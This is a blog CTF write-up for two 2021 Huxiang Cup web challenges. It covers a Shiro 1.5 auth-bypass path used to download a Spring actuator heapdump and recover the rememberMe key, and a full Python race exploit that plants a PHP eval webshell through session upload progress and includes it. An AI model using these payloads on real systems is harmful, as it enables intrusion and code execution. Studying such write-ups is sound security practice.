2021第七届湖湘杯-web-wp

最新推荐文章于 2024-04-17 17:35:31 发布
最新推荐文章于 2024-04-17 17:35:31 发布
阅读量4.1k 收藏
点赞数 1
分类专栏: Web 文章标签: php 安全 安全漏洞 wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanmiqi/article/details/121334649
版权

2021第七届湖湘杯-web-wp

Web2 Pentest in Autumn

题目给的附件Pom.xml

Pom.xml 中有actuator
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator

Springboot中actuator常见接口(1.x能够直接访问,2.x是在actuator目录下)
在这里插入图片描述

由于没有权限,接下来访问都是302
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator/health
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator/env
(信息泄露)

Shiro1.5 鉴权绕过去下载文件
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/aa/…/;test=/actuator/health
把文件都下载下来

下载heapdump
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/aa/…/;test=/actuator/heapdump

利用 visualvm 打开下载的heapdump文件
https://visualvm.github.io/download.html

全局搜索org.apache.shiro.web.mgt.CookieRememberMeManager

在这里插入图片描述
将byte转换成base64形式的key

import base64
import struct

res = base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb', 58,5,22,5,117,45,-35,82,-15,62,-57,117,-78,15,23,-89))
print(res)

(参考:https://www.cnblogs.com/icez/p/Actuator_heapdump_exploit.html)

在这里插入图片描述
CB链,Spring回显

在这里插入图片描述

Web1 easywill

题目没有给源码,根据描述从网上下一份easywillV2.1.5(https://gitee.com/willphp/willphpv2/tree/808b3a36d366f66a88fd130cc6514c20eaf15450/)

首页中assign可控两个参数,其中根据view函数发现覆盖变量cfile
在这里插入图片描述
尝试session包含
Exp

# coding=utf-8
import io
import requests
import threading

sessid = 'flag'
data = {"cmd": "system('cat /ffffffff14ggggggg3');"}
url = "http://eci-2zec2ffu8ckzf0eggcpe.cloudeci1.ichunqiu.com/index.php"

def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post(url,
                            data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'},
                            files={'file': ('midi.txt', f)}, cookies={'PHPSESSID': sessid})


def read(session):
    while True:
        resp = session.post(url+'?name=cfile&value=/tmp/sess_' + sessid,
                            data=data)
        if 'midi.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            pass


if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()

        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
    event.set()

在这里插入图片描述

ISMidi
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-河南省金盾-部分题目wp(详细)
02-06
WEB:上传你的头像吧、上传你的压缩包吧、管理员才能拿flag Crypto:Hi There、低音吉他谱、未完成的宣传图 Misc:潦草的笔记、这可是关键信息、hello-world Reverse:Re1、Re2、Re4
web-stories-wp:WordPress的网络故事
02-05
建立状态 是一种免费的开放式Web视觉叙事格式,可让您轻松地通过引人入胜的动画和可点击的交互方式创建视觉叙事,并使读者沉浸在出色且快速加载的全屏体验中。 借助 ,我们提供了一流的Web Stories支持。 通过直接...
CTF 湖湘 决赛 2021 final.zip
12-07
CTF 湖湘 决赛 2021 final
第七届湖湘” Bugku战队writeup
volcano的博客
11-19 4633
湖湘越来越难了。。。这次我只出了一道密码和一道杂项。 wpwebEazywillPentest in Autumncryptosigninmisc某取证题pwntiny_httpdreverseHideit web Eazywill 开局给了源代码,审计一下 重点在View::fetch()函数,经过一系列流程调用了renderTo,以下是重点代码 extract($_vars); include $cfile; 那么直接传参: /?name=cfile&value=/etc/passwd 可
[湖湘 2021 final]Penetratable
最新发布
qq_46603839的博客
04-17 807
c=root&m=getLogList页面 可以进行下载 下载的文件是日志 试试能不能下载别的 结合之前扫描爆出来的那几个目录试试 然后找了好久都返回文件不存在 参考参考别人wp 人家找文件就好对找。试试修改密码后 能否使用 admin 能不能登录 登陆成功后发现admin是不允许修改的密码的 同时参数多了两个页面?考虑到admin页面的情况以及js代码中的注释 用用admin的api试试。对注册进行构造name=admin" – + 再进行登录。这里一定要改cookie不然就会这样。
[HXBCTF 2021]湖湘easywill
weixin_45751765的博客
12-01 3661
0x00 前言 这次接触到pear有点陌生 先本地弄弄 参考师傅 https://blog.csdn.net/rfrder/article/details/121042290 啥是Pear? pear (全称为PHP扩展与应用库) 1.如前所述,PEAR按照一定的分类来管理PEAR应用代码库,你的PEAR代码可以组织到其中适当的目录中,其他的人可以方便地检索并分享到你的成果。 2.PEAR不仅仅是一个代码仓库,它同时也是一个标准,使用这个标准来书写你的PHP代码,将会增强你的程序的可读性,复用性,减少
2021年--湖湘--final
unexpectedthing的博客
04-28 1357
21年湖湘比赛
2019湖湘部分WP
蚁景网安学院
11-12 993
0x01 untar直接访问题目可以看到源码<?php $sandbox = "sandbox/" . md5($_SERVER["REMOTE_A...
NGINX-WP-Rocket:NGINX最佳WordPress性能增强器配置-WP Rocket Rock ..
05-12
-- NGINX-WP-Rocket NGINX-WP-Rocket是缓存插件的配置。 它使Nginx可以直接提供以前缓存的文件,而无需调用WordPress或任何PHP。 它还添加了标头来缓存CSS,JS和媒体,以便通过减少对Web服务器的请求来利用浏览器的...
Learn-wp-cli:命令行,WP-CLI和自定义WP-CLI命令入门
02-05
**WP-CLI(WordPress Command Line Interface)是WordPress开发和管理中的一个强大工具,它允许用户通过命令行界面执行各种操作,而无需通过图形用户界面。本教程将带你深入理解WP-CLI,包括如何安装、使用基础命令...
wp-pot-cli:通过cli运行wp-pot脚本
02-05
在这里做:安装$ npm install --global wp-pot-cli用法$ wp-pot --help Generate pot-files for WordPress localization Usage $ wp-pot <options> Options --bug-report, -b Header with URL for reporting ...
2021湖湘wp_web
meteox的博客
11-15 4180
easywill will框架,版本是1.51,直接gitee下载源码回退版本即可https://gitee.com/willphp/willphpv2 该框架参考了thinkphp,开头首页给出了assign($name,$value)渲染,然后return了view(),thinkphp有个相关的文件包含漏洞和这个很像 https://www.freebuf.com/column/207878.html 从view->fetch->render->renderTo逐步跟进,发现有变量覆
2021-湖湘final-Web
feng的博客
01-05 2084
2021-湖湘final-Web 前言 今年湖湘报的社企组的结果就是最后只能摆烂,然后决赛那段时间正好在复习期末,然后考完了想好好的休息一段时间,打游戏打累了再来复现一下湖湘final的题目放松放松。 vote 今年HTB的基本上算是原题了,复现的时候才发现当时做那题的时候就摆烂没管了,所以一点印象没有。。。 const path = require('path'); const express = require('express'); const pug
湖湘2018】第一次写wp就写个贼水的吧。。。
KingJerry的博客
11-19 642
昨天去考英语六级口语然后在外面浪一天,然后突然想起来好像有个比赛23333333 匆匆忙忙赶回来已经迟了。。。 行吧。。。   1、题目名 Welcome   关注公众号回复可得flag   2、题目名Disk  先用FTK扫描文件   发现四个flag文件将所有二进制复制下来 01100110011011000110000101100111011110110011...
[湖湘 2021 final]Penetratable-----记suid提权
qq_73767109的博客
06-24 313
于是可以根据这个发包对里面的data改写成root的,这要登录在admin下进行修改,因为root没有权限哪只能是admin有。sed命令来自英文词组“stream editor”的缩写,其功能是用于利用语法/脚本对文本文件进行批量的编辑操作。可以看到有目录泄露,经过读取有static里可以看到有用信息其他的都说php文件读取后没有回显。但是用同样的方式发现不能对root进行修改密码导致不能登录root。这样意思是在admin下修改root的密码,这里修改为root。登录后暂时没有发现什么有用的信息。
2021-湖湘-Web
feng的博客
11-14 4531
前言 总的来说的话,题目质量还是不错的,另外那道XSS也是0解,也幸好自己是一点XSS都不会(寒假补一波),卷是真的卷,还有很多的东西都只停留在表面吧,除了shiro的鉴权绕过是自己之前专门学过的,所以打开pom.xml看到1.5.0的版本立马就知道这题得有个鉴权绕过,别的,剩下的打shiro一开始没打通才换了工具打(后来才发现我一直在拿cc的链子打,我说怎么打不通。。。)。还是慢慢学习了。 easywill 打开页面发现是个WillPHP,而且应该就是assign的模板渲染了,而且根据这个东西和tp有点关
--wp--preset--color--black:这是什么
07-12
`--wp--preset--color--black` 是一个以双短横线开头的 CSS 自定义属性(CSS Custom Property)。 这个属性看起来是一个特定于某个平台或框架的命名约定,其中 `wp` 可能代表 WordPress,`preset` 可能代表预设,`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值